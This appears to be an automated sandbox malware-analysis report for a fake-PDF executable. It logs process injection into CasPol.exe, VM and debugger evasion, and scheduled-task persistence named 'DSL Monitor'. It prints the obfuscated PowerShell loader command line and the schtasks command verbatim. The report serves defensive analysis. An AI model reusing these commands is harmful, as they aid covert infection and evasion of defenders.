Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

File opened: C:\Windows\resources\0409\Praktikerens\Ssygt\Adobos\Arbejdsstykker.ini count: 82170

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

API/Special instruction interceptor: Address: 458F450

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Source: powershell.exe, 00000004.00000002.24020469340.0000000007620000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEDAI\0
Source: powershell.exe, 00000004.00000002.24023428377.0000000008B80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE&

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Memory allocated: 219A0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Memory allocated: 219A0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Memory allocated: 239A0000 memory commit | memory reserve | memory write watch			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Memory allocated: 10A0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Memory allocated: 2ED0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Memory allocated: 4ED0000 memory commit | memory reserve | memory write watch			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9931			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9922			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Window / User API: threadDelayed 8028			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Window / User API: foregroundWindowGot 1694			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4536	Thread sleep count: 9922 > 30			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7804	Thread sleep time: -1844674407370954s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 6268	Thread sleep time: -74500s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 6268	Thread sleep time: -4014000s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2984	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Code function: 0_2_004065DA FindFirstFileW,FindClose,		0_2_004065DA
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_004059A9

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000004.00000002.24023428377.0000000008B80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe&
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 00000005.00000002.28382435662.000000000519B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000004.00000002.24112781122.000000000D4D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: powershell.exe, 00000004.00000002.24020469340.0000000007620000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exedaI\0

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_0323D7E4 LdrInitializeThunk,

4_2_0323D7E4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe base: B00000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi Slbra NbIno Or AsTa/Tr2Sk]Br P=Ud Un(Su`$SaTIthEfiBao Ct BhAlrFli Txga[Pa`$SnAWinBrt CiUnlKraOdbMeo ArHlsMi/Sp2Vi]Br L-FobVaxSpoDerCa K1 S1Fo8Mb) f;Sy P L Y Ty}Re Ki[ DSEnt Sr FiAnnStgSl]St[SaS KyGis Lt Ue fmPa. STPle pxgotAb. SEBrnSuc Ko rdAfiunn Pg b] K: S: RA IS SCSlI LINo.TeG de BtAmSditPur Zi PnHag T(Ca`$DaTGrhCiiscoUntRuhRorUsiSax M)As;Dd} s`$ViS PkOarfim Ga Ar mbMae SjAmd Re OsEp0 O=InBDerBauVid SgNooInmHymSkeDa0Ar4 I Bo' D2Ek5Nu0StFFa0Hu5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma2 I1 NAAn1BiAPe' S;Pr`$ KSUdkLarMum JaudrAfb ReKlj AdAkeBrsSt1fo=GoBBrr PuTrdPegProLam Pmame P0Gu4 R Uf' R3MiBbl1YnFAs1 R5Ec0My4 M1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M5Ra8No2 A1De1 SFTo1 I8 R4Op5 R4Pa4Ni5 S8 J2 O3St1Ko8 S0Be5in1In7ud1Ov0Fo1 b3 S3Un8Bi1 L7 L0 K2Fl1 MF E0Ma0Ov1Qu3Ge3 bBEr1De3cl0Fi2 K1 OESc1 B9 L1 A2 M0 B5Ko'Ou; F`$SlS skHkrStm CaAnr UbExe AjKodTre AsSk2Ge= FBGar suScdImgSkoKam sm DePr0Co4Br Sa' A3 S1Ko1Sj3Ja0 S2Un2 L6Sc0Bu4 M1Be9 I1 G5 D3Sp7 S1Dy2Wi1 S2 G0 E4 P1In3 A0 V5Bt0Bu5In'mo;sm`$PrSSik IrGrmafa ArUnbSte SjModPieVas H3Av=PjB Mr Bu udOlg woWim Mm Me U0ha4 S De' F2 v5Sw0obFAs0fo5 B0 S2Ma1 S3 S1 FBMo5Do8Ge2V 4Us0 A3 s1 M8Xa0Sl2Fl1VeF S1DeB Q1 U3ma5 a8Re3AnFWi1 G8 T0 D2Sy1po3Ny0 D4Bo1 E9 S0Fo6 P2Av5 L1Re3Un0sn4Ag0Co0ba1 FF T1 P5 o1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T1nu8Vr1Gr2 R1MiA S1Ra3Ge2Un4 U1Ov3 C1Ud0Hd'Ro;Ru`$JoS UkAfr Sm IaSerMob IeFljUddWieFes G4 K= IB KrdruTidDegNoo cmbim keWa0 P4Ru Se'Te0Di5Re0Un2Pr0Co4 R1BrFSp1se8 G1Fl1Pu'Il;Se`$KeSFukUfrThm Na LrVib Se Fj UdPaeBasAn5un=StBDyr Au TdSjg PoKumLdm te L0Im4Lo Ne'Gy3Pe1Bl1 D3Hy0Br2Ko3LiBPa1be9Ma1Vi2Tr0su3Se1 PA T1 M3Mo3HaESu1No7Gr1 R8 T1Ke2St1 SA U1St3 V'Ji;Tr`$beSTakMir HmDoa FrSvbVieOljlad CeTrsAf6 D=PeB CrMau RdRegMio Wm bmBoe U0Bl4 F my' V2Rn4Ge2Ge2 G2cl5 A0On6 F1Ti3Ap1Hj5sj1AtFSk1 F7 T1 MA s3 C8 M1 N7Ok1 TB E1Fo3 B5PrAUt5Eu6Dv3 VE s1 IF E1Bo2Hy1 V3 A3 E4 B0RoFRe2Fa5 O1 AFAl1Fa1Te5boA I5Be6 H2 R6 B0Su3Sm1 G4F			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#fordaervet kauch ticklenburg synonymized nippers hysse #>$boarspear = """pe;ref susunskc otpri po cn d aebcartju cd kg coasmsemdee m0wa4 k b{st do tr u kopteafor oaatmno(ov[haspot fr uislnspgvo] h`$pis ca ulsteans fwdio om fe un p)re; d de d a d`$ rt fh vichoopt ch wr ti ex t no= r snnoeinwud-ocoreb ujfoe scgotoc mebmiyldtprein[fo] p sc(ib`$ csspa ll ueens mwseogdm bedynan.inl de an bgjot ch p fo/co a2su) i; d ma sc f flffyoslrme(sc`$ pa dnpitpai flmuatrbaso prsks k=pa0ra;bi b`$baa nn gtpoi llsparabhvo srbls v pr- ml atbo fa`$pasdia slopebaslew so sm ze mnsl.lylvaedrn yg ft dh t;il lf`$ pa pnhyt ci nlekatabfiostrsks c+ i=li2an)af{ku d sk e st ku pe fo fa`$ekt bhsei sogutbehinr uivaxun[ta`$biayondat sirelima abguo nr ws t/ t2 p] f no= o pa[uncgloinn bvpye sruntse]im: u:cattho pbsyyantaueun(fj`$ ss ia tl semes fw bo bmfoebonsu.kls au kb ss mtlor tispnang z(st`$phaunnsatbui hlfoamybmiosortus d, i er2un) g,in au1mu6ca)mi;en re ti`$ret fh siroofit sh prsoi dxsv[ar`$gaacintrtedi slbra nbino or asta/tr2sk]br p=ud un(su`$satithefibao ct bhalrfli txga[pa`$snawinbrt ciunlkraodbmeo arhlsmi/sp2vi]br l-fobvaxspoderca k1 s1fo8mb) f;sy p l y ty}re ki[ dsent sr fiannstgsl]st[sas kygis lt ue fmpa. stple pxgotab. sebrnsuc ko rdafiunn pg b] k: s: ra is scsli lino.teg de btamsditpur zi pnhag t(ca`$datgrhciiscountruhrorusisax m)as;dd} s`$vis pkoarfim ga ar mbmae sjamd re osep0 o=inbderbauvid sgnooinmhymskeda0ar4 i bo' d2ek5nu0stffa0hu5 s0un2dj1 u3de1 tb k5cl8 t1ma2 i1 naan1biape' s;pr`$ ksudklarmum jaudrafb reklj adakebrsst1fo=gobbrr putrdpegprolam pmame p0gu4 r uf' r3mibbl1ynfas1 r5ec0my4 m1 s9ro0de5 s1bj9 n1 h0ga0 u2 m5ra8no2 a1de1 sfto1 i8 r4op5 r4pa4ni5 s8 j2 o3st1ko8 s0be5in1in7ud1ov0fo1 b3 s3un8bi1 l7 l0 k2fl1 mf e0ma0ov1qu3ge3 bber1de3cl0fi2 k1 oesc1 b9 l1 a2 m0 b5ko'ou; f`$sls skhkrstm caanr ubexe ajkodtre assk2ge= fbgar suscdimgskokam sm depr0co4br sa' a3 s1ko1sj3ja0 s2un2 l6sc0bu4 m1be9 i1 g5 d3sp7 s1dy2wi1 s2 g0 e4 p1in3 a0 v5bt0bu5in'mo;sm`$prssik irgrmafa arunbste sjmodpievas h3av=pjb mr bu udolg wowim mm me u0ha4 s de' f2 v5sw0obfas0fo5 b0 s2ma1 s3 s1 fbmo5do8ge2v 4us0 a3 s1 m8xa0sl2fl1vef s1deb q1 u3ma5 a8re3anfwi1 g8 t0 d2sy1po3ny0 d4bo1 e9 s0fo6 p2av5 l1re3un0sn4ag0co0ba1 ff t1 p5 o1ke3 c0bo5 o5un8no3 se p1re7 t1nu8vr1gr2 r1mia s1ra3ge2un4 u1ov3 c1ud0hd'ro;ru`$jos ukafr sm iasermob iefljuddwiefes g4 k= ib krdrutiddegnoo cmbim kewa0 p4ru se'te0di5re0un2pr0co4 r1brfsp1se8 g1fl1pu'il;se`$kesfukufrthm na lrvib se fj udpaebasan5un=stbdyr au tdsjg pokumldm te l0im4lo ne'gy3pe1bl1 d3hy0br2ko3libpa1be9ma1vi2tr0su3se1 pa t1 m3mo3haesu1no7gr1 r8 t1ke2st1 sa u1st3 v'ji;tr`$bestakmir hmdoa frsvbvieoljlad cetrsaf6 d=peb crmau rdregmio wm bmboe u0bl4 f my' v2rn4ge2ge2 g2cl5 a0on6 f1ti3ap1hj5sj1atfsk1 f7 t1 ma s3 c8 m1 n7ok1 tb e1fo3 b5praut5eu6dv3 ve s1 if e1bo2hy1 v3 a3 e4 b0rofre2fa5 o1 afal1fa1te5boa i5be6 h2 r6 b0su3sm1 g4f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#fordaervet kauch ticklenburg synonymized nippers hysse #>$boarspear = """pe;ref susunskc otpri po cn d aebcartju cd kg coasmsemdee m0wa4 k b{st do tr u kopteafor oaatmno(ov[haspot fr uislnspgvo] h`$pis ca ulsteans fwdio om fe un p)re; d de d a d`$ rt fh vichoopt ch wr ti ex t no= r snnoeinwud-ocoreb ujfoe scgotoc mebmiyldtprein[fo] p sc(ib`$ csspa ll ueens mwseogdm bedynan.inl de an bgjot ch p fo/co a2su) i; d ma sc f flffyoslrme(sc`$ pa dnpitpai flmuatrbaso prsks k=pa0ra;bi b`$baa nn gtpoi llsparabhvo srbls v pr- ml atbo fa`$pasdia slopebaslew so sm ze mnsl.lylvaedrn yg ft dh t;il lf`$ pa pnhyt ci nlekatabfiostrsks c+ i=li2an)af{ku d sk e st ku pe fo fa`$ekt bhsei sogutbehinr uivaxun[ta`$biayondat sirelima abguo nr ws t/ t2 p] f no= o pa[uncgloinn bvpye sruntse]im: u:cattho pbsyyantaueun(fj`$ ss ia tl semes fw bo bmfoebonsu.kls au kb ss mtlor tispnang z(st`$phaunnsatbui hlfoamybmiosortus d, i er2un) g,in au1mu6ca)mi;en re ti`$ret fh siroofit sh prsoi dxsv[ar`$gaacintrtedi slbra nbino or asta/tr2sk]br p=ud un(su`$satithefibao ct bhalrfli txga[pa`$snawinbrt ciunlkraodbmeo arhlsmi/sp2vi]br l-fobvaxspoderca k1 s1fo8mb) f;sy p l y ty}re ki[ dsent sr fiannstgsl]st[sas kygis lt ue fmpa. stple pxgotab. sebrnsuc ko rdafiunn pg b] k: s: ra is scsli lino.teg de btamsditpur zi pnhag t(ca`$datgrhciiscountruhrorusisax m)as;dd} s`$vis pkoarfim ga ar mbmae sjamd re osep0 o=inbderbauvid sgnooinmhymskeda0ar4 i bo' d2ek5nu0stffa0hu5 s0un2dj1 u3de1 tb k5cl8 t1ma2 i1 naan1biape' s;pr`$ ksudklarmum jaudrafb reklj adakebrsst1fo=gobbrr putrdpegprolam pmame p0gu4 r uf' r3mibbl1ynfas1 r5ec0my4 m1 s9ro0de5 s1bj9 n1 h0ga0 u2 m5ra8no2 a1de1 sfto1 i8 r4op5 r4pa4ni5 s8 j2 o3st1ko8 s0be5in1in7ud1ov0fo1 b3 s3un8bi1 l7 l0 k2fl1 mf e0ma0ov1qu3ge3 bber1de3cl0fi2 k1 oesc1 b9 l1 a2 m0 b5ko'ou; f`$sls skhkrstm caanr ubexe ajkodtre assk2ge= fbgar suscdimgskokam sm depr0co4br sa' a3 s1ko1sj3ja0 s2un2 l6sc0bu4 m1be9 i1 g5 d3sp7 s1dy2wi1 s2 g0 e4 p1in3 a0 v5bt0bu5in'mo;sm`$prssik irgrmafa arunbste sjmodpievas h3av=pjb mr bu udolg wowim mm me u0ha4 s de' f2 v5sw0obfas0fo5 b0 s2ma1 s3 s1 fbmo5do8ge2v 4us0 a3 s1 m8xa0sl2fl1vef s1deb q1 u3ma5 a8re3anfwi1 g8 t0 d2sy1po3ny0 d4bo1 e9 s0fo6 p2av5 l1re3un0sn4ag0co0ba1 ff t1 p5 o1ke3 c0bo5 o5un8no3 se p1re7 t1nu8vr1gr2 r1mia s1ra3ge2un4 u1ov3 c1ud0hd'ro;ru`$jos ukafr sm iasermob iefljuddwiefes g4 k= ib krdrutiddegnoo cmbim kewa0 p4ru se'te0di5re0un2pr0co4 r1brfsp1se8 g1fl1pu'il;se`$kesfukufrthm na lrvib se fj udpaebasan5un=stbdyr au tdsjg pokumldm te l0im4lo ne'gy3pe1bl1 d3hy0br2ko3libpa1be9ma1vi2tr0su3se1 pa t1 m3mo3haesu1no7gr1 r8 t1ke2st1 sa u1st3 v'ji;tr`$bestakmir hmdoa frsvbvieoljlad cetrsaf6 d=peb crmau rdregmio wm bmboe u0bl4 f my' v2rn4ge2ge2 g2cl5 a0on6 f1ti3ap1hj5sj1atfsk1 f7 t1 ma s3 c8 m1 n7ok1 tb e1fo3 b5praut5eu6dv3 ve s1 if e1bo2hy1 v3 a3 e4 b0rofre2fa5 o1 afal1fa1te5boa i5be6 h2 r6 b0su3sm1 g4f			Jump to behavior

Source: CasPol.exe, 00000005.00000002.28419341810.0000000023D70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #Program Managerknown.
Source: CasPol.exe, 00000005.00000002.28397844456.0000000021F17000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28419341810.0000000023D70000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28397844456.0000000021F21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: CasPol.exe, 00000005.00000002.28397844456.0000000021BAB000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28397844456.0000000021F2B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28397844456.0000000021F28000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerpo%
Source: CasPol.exe, 00000005.00000002.28397844456.00000000219F4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerp
Source: CasPol.exe, 00000005.00000002.28420339786.0000000023DDC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28420600342.0000000023E63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #Program Manager
Source: CasPol.exe, 00000005.00000002.28420600342.0000000023DF7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28420600342.0000000023DEC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerknown.
Source: CasPol.exe, 00000005.00000002.28397844456.0000000021F2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerr
Source: CasPol.exe, 00000005.00000002.28420600342.0000000023DFC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28420600342.0000000023DE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:55db;192.168.11.20

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
